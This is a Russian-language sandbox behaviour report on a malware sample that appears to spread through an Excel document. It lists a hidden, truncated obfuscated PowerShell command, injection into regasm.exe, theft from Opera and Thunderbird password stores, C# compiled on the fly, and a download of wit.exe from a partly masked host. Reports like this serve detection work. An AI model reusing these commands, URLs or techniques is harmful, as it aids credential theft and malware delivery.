Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function qa6dcbd {param($ka95b)$cd78e='zf982';$h6dee='';for ($i=0; $i -lt $ka95b.length;$i+=2){$x3f466=[convert]::ToByte($ka95b.Substring($i,2),16);$h6dee+=[char]($x3f466 ...
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe
Читает файлы, отвечающие за хранение паролей сторонними программами
- %APPDATA%\opera software\opera stable\login data
- %APPDATA%\thunderbird\profiles.ini
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\v3w2rele.0.cs
- %TEMP%\cscb52.tmp
- %TEMP%\fugfh4xi.out
- %TEMP%\fugfh4xi.cmdline
- %TEMP%\fugfh4xi.0.cs
- %TEMP%\y_wpu3z0.dll
- %TEMP%\reseee2.tmp
- %TEMP%\csceec2.tmp
- %TEMP%\72dwmi4r.dll
- %TEMP%\y_wpu3z0.out
- %TEMP%\y_wpu3z0.0.cs
- %TEMP%\vxis8snb.dll
- %TEMP%\resc6d8.tmp
- %TEMP%\cscc6c8.tmp
- %TEMP%\vxis8snb.out
- %TEMP%\vxis8snb.cmdline
- %TEMP%\vxis8snb.0.cs
- %TEMP%\y_wpu3z0.cmdline
- %APPDATA%\w9d3e.exe
- %TEMP%\resb63.tmp
- %TEMP%\xtc6vqlx.out
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{0165f1ef-e220-4d25-a437-4cb52d6feb5b}.tmp
- %TEMP%\xtc6vqlx.dll
- %TEMP%\res5f5f.tmp
- %TEMP%\3ujq4cvx.0.cs
- %TEMP%\fugfh4xi.dll
- %TEMP%\xtc6vqlx.cmdline
- %TEMP%\xtc6vqlx.0.cs
- %TEMP%\3ujq4cvx.dll
- %TEMP%\res4b89.tmp
- %TEMP%\csc4b78.tmp
- %TEMP%\3ujq4cvx.out
- %TEMP%\3ujq4cvx.cmdline
- %TEMP%\csc5f4e.tmp
- %TEMP%\resb19b.tmp
- %TEMP%\cscb18a.tmp
- %TEMP%\72dwmi4r.out
- %TEMP%\res5244.tmp
- %TEMP%\gfrimkje.dll
- %TEMP%\res50cd.tmp
- %TEMP%\res511c.tmp
- %TEMP%\csc5234.tmp
- %TEMP%\csc50fb.tmp
- %TEMP%\asyw1h2_.dll
- %TEMP%\csc50cc.tmp
- %TEMP%\asyw1h2_.cmdline
- %TEMP%\asyw1h2_.0.cs
- %TEMP%\gfrimkje.out
- %TEMP%\gfrimkje.cmdline
- %TEMP%\gfrimkje.0.cs
- %TEMP%\v3w2rele.out
- %TEMP%\v3w2rele.cmdline
- %TEMP%\asyw1h2_.out
- %TEMP%\8bmqbc9v.0.cs
- %TEMP%\v3w2rele.dll
- %TEMP%\8bmqbc9v.cmdline
- %TEMP%\72dwmi4r.cmdline
- %TEMP%\euqhbp4p.dll
- %TEMP%\72dwmi4r.0.cs
- %TEMP%\9cbpftsk.dll
- %TEMP%\res8943.tmp
- %TEMP%\csc8922.tmp
- %TEMP%\9cbpftsk.out
- %TEMP%\9cbpftsk.cmdline
- %TEMP%\9cbpftsk.0.cs
- %TEMP%\res77ce.tmp
- %TEMP%\8bmqbc9v.out
- %TEMP%\csc74a0.tmp
- %TEMP%\euqhbp4p.out
- %TEMP%\euqhbp4p.cmdline
- %TEMP%\euqhbp4p.0.cs
- %TEMP%\8bmqbc9v.dll
- %TEMP%\res69e3.tmp
- %TEMP%\csc69d3.tmp
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
Удаляет следующие файлы
- %TEMP%\res50cd.tmp
- %TEMP%\y_wpu3z0.out
- %TEMP%\y_wpu3z0.pdb
- %TEMP%\y_wpu3z0.dll
- %TEMP%\y_wpu3z0.cmdline
- %TEMP%\csceec2.tmp
- %TEMP%\reseee2.tmp
- %TEMP%\vxis8snb.pdb
- %TEMP%\vxis8snb.out
- %TEMP%\vxis8snb.cmdline
- %TEMP%\vxis8snb.dll
- %TEMP%\vxis8snb.0.cs
- %TEMP%\cscc6c8.tmp
- %TEMP%\resc6d8.tmp
- %TEMP%\72dwmi4r.out
- %TEMP%\72dwmi4r.0.cs
- %TEMP%\72dwmi4r.cmdline
- %TEMP%\72dwmi4r.pdb
- %TEMP%\cscb18a.tmp
- %TEMP%\72dwmi4r.dll
- %TEMP%\y_wpu3z0.0.cs
- %TEMP%\resb63.tmp
- %TEMP%\xtc6vqlx.pdb
- %TEMP%\xtc6vqlx.dll
- %TEMP%\xtc6vqlx.0.cs
- %TEMP%\csc5f4e.tmp
- %TEMP%\res5f5f.tmp
- %TEMP%\3ujq4cvx.pdb
- %TEMP%\3ujq4cvx.0.cs
- %TEMP%\3ujq4cvx.cmdline
- %TEMP%\3ujq4cvx.dll
- %TEMP%\euqhbp4p.dll
- %TEMP%\csc4b78.tmp
- %TEMP%\res4b89.tmp
- %TEMP%\fugfh4xi.cmdline
- %TEMP%\fugfh4xi.pdb
- %TEMP%\fugfh4xi.0.cs
- %TEMP%\fugfh4xi.dll
- %TEMP%\fugfh4xi.out
- %TEMP%\cscb52.tmp
- %TEMP%\resb19b.tmp
- %TEMP%\9cbpftsk.cmdline
- %TEMP%\9cbpftsk.out
- %TEMP%\asyw1h2_.0.cs
- %TEMP%\v3w2rele.pdb
- %TEMP%\v3w2rele.0.cs
- %TEMP%\v3w2rele.cmdline
- %TEMP%\v3w2rele.dll
- %TEMP%\v3w2rele.out
- %TEMP%\csc5234.tmp
- %TEMP%\res5244.tmp
- %TEMP%\csc50fb.tmp
- %TEMP%\res511c.tmp
- %TEMP%\gfrimkje.out
- %TEMP%\gfrimkje.0.cs
- %TEMP%\gfrimkje.cmdline
- %TEMP%\gfrimkje.dll
- %TEMP%\gfrimkje.pdb
- %TEMP%\csc50cc.tmp
- %TEMP%\asyw1h2_.dll
- %TEMP%\asyw1h2_.out
- %TEMP%\asyw1h2_.pdb
- %TEMP%\asyw1h2_.cmdline
- %TEMP%\9cbpftsk.dll
- %TEMP%\res69e3.tmp
- %TEMP%\9cbpftsk.0.cs
- %TEMP%\9cbpftsk.pdb
- %TEMP%\csc8922.tmp
- %TEMP%\res8943.tmp
- %TEMP%\euqhbp4p.0.cs
- %TEMP%\euqhbp4p.pdb
- %TEMP%\euqhbp4p.cmdline
- %TEMP%\3ujq4cvx.out
- %TEMP%\xtc6vqlx.cmdline
- %TEMP%\csc74a0.tmp
- %TEMP%\res77ce.tmp
- %TEMP%\8bmqbc9v.cmdline
- %TEMP%\8bmqbc9v.out
- %TEMP%\8bmqbc9v.0.cs
- %TEMP%\8bmqbc9v.dll
- %TEMP%\8bmqbc9v.pdb
- %TEMP%\csc69d3.tmp
- %TEMP%\euqhbp4p.out
- %TEMP%\xtc6vqlx.out
Сетевая активность
TCP
Запросы HTTP GET
- http://dr######i-8272.babyblue.jp/blessed/wit.exe
UDP
- DNS ASK dr######i-8272.babyblue.jp
- DNS ASK ap#.#pify.org
Другое
Создает и запускает на исполнение
- '%APPDATA%\w9d3e.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function qa6dcbd {param($ka95b)$cd78e='zf982';$h6dee='';for ($i=0; $i -lt $ka95b.length;$i+=2){$x3f466=[convert]::ToByte($ka95b.Substring($i,2),16);$h6dee+=[char]($x3f466 ...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4B89.tmp" "%TEMP%\CSC4B78.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\3ujq4cvx.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB63.tmp" "%TEMP%\CSCB52.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fugfh4xi.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEEE2.tmp" "%TEMP%\CSCEEC2.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\y_wpu3z0.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC6D8.tmp" "%TEMP%\CSCC6C8.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\vxis8snb.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB19B.tmp" "%TEMP%\CSCB18A.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\72dwmi4r.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8943.tmp" "%TEMP%\CSC8922.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\9cbpftsk.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES77CE.tmp" "%TEMP%\CSC74A0.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\euqhbp4p.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES69E3.tmp" "%TEMP%\CSC69D3.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\8bmqbc9v.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5244.tmp" "%TEMP%\CSC5234.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES511C.tmp" "%TEMP%\CSC50FB.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES50CD.tmp" "%TEMP%\CSC50CC.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\asyw1h2_.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gfrimkje.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\v3w2rele.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xtc6vqlx.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5F5F.tmp" "%TEMP%\CSC5F4E.tmp"' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5F5F.tmp" "%TEMP%\CSC5F4E.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xtc6vqlx.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4B89.tmp" "%TEMP%\CSC4B78.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\3ujq4cvx.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB63.tmp" "%TEMP%\CSCB52.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fugfh4xi.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEEE2.tmp" "%TEMP%\CSCEEC2.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\y_wpu3z0.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC6D8.tmp" "%TEMP%\CSCC6C8.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\vxis8snb.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB19B.tmp" "%TEMP%\CSCB18A.tmp"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\72dwmi4r.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\9cbpftsk.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES77CE.tmp" "%TEMP%\CSC74A0.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\euqhbp4p.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES69E3.tmp" "%TEMP%\CSC69D3.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\8bmqbc9v.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5244.tmp" "%TEMP%\CSC5234.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES511C.tmp" "%TEMP%\CSC50FB.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES50CD.tmp" "%TEMP%\CSC50CC.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\asyw1h2_.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gfrimkje.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\v3w2rele.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES8943.tmp" "%TEMP%\CSC8922.tmp"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe'
